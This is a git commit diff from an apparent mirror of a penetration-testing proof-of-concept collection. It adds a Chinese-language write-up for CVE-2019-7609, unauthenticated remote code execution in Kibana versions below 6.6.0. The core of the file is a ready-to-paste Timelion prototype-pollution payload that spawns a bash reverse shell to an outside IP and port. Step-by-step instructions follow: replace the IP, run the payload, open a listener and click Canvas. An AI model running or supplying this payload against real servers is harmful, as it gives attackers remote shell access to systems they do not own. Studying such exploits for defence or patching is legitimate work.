mirror of
https://github.com/Mr-xn/Penetration_Testing_POC.git
synced 2025-06-20 09:50:19 +00:00
add CVE-2019-7609-kibana低于6.6.0未授权远程代码命令执行
This commit is contained in:
parent
e6a1a3cea5
commit
3924835f88
14
CVE-2019-7609-kibana低于6.6.0未授权远程代码命令执行.md
Normal file
14
CVE-2019-7609-kibana低于6.6.0未授权远程代码命令执行.md
Normal file
@ -0,0 +1,14 @@
|
||||
## CVE-2019-7609-kibana<6.6.0未授权远程代码命令执行
|
||||
|
||||
## POC
|
||||
将POC里的反链IP地址换成自己的,然后在目标机器上的 `Timelion` 选项下将以下 `POC` 粘贴进去,然后点击 `Run` 运行:
|
||||
|
||||
```
|
||||
.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/10.10.20.166/8989 0>&1");process.exit()//')
|
||||
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
|
||||
```
|
||||

|
||||
|
||||
然后自己机器开启监听,再点击 `Canvas` 即可出发漏洞。
|
||||

|
||||
|
@ -79,6 +79,7 @@
|
||||
- [CVE-2019-16278andCVE-2019-16279-about-nostromo-nhttpd](./CVE-2019-16278andCVE-2019-16279-about-nostromo-nhttpd.md)
|
||||
- [CVE-2019-11043-PHP远程代码执行漏](./CVE-2019-11043)
|
||||
- [ThinkCMF漏洞全集和](./ThinkCMF漏洞全集和.md)
|
||||
- [CVE-2019-7609-kibana低于6.6.0未授权远程代码命令执行](./CVE-2019-7609-kibana低于6.6.0未授权远程代码命令执行.md)
|
||||
|
||||
## 提权辅助相关
|
||||
|
||||
|
BIN
img/Canvas.jpg
Normal file
BIN
img/Canvas.jpg
Normal file
Binary file not shown.
After Width: | Height: | Size: 425 KiB |
BIN
img/Timelion.jpg
Normal file
BIN
img/Timelion.jpg
Normal file
Binary file not shown.
After Width: | Height: | Size: 303 KiB |
Loading…
x
Reference in New Issue
Block a user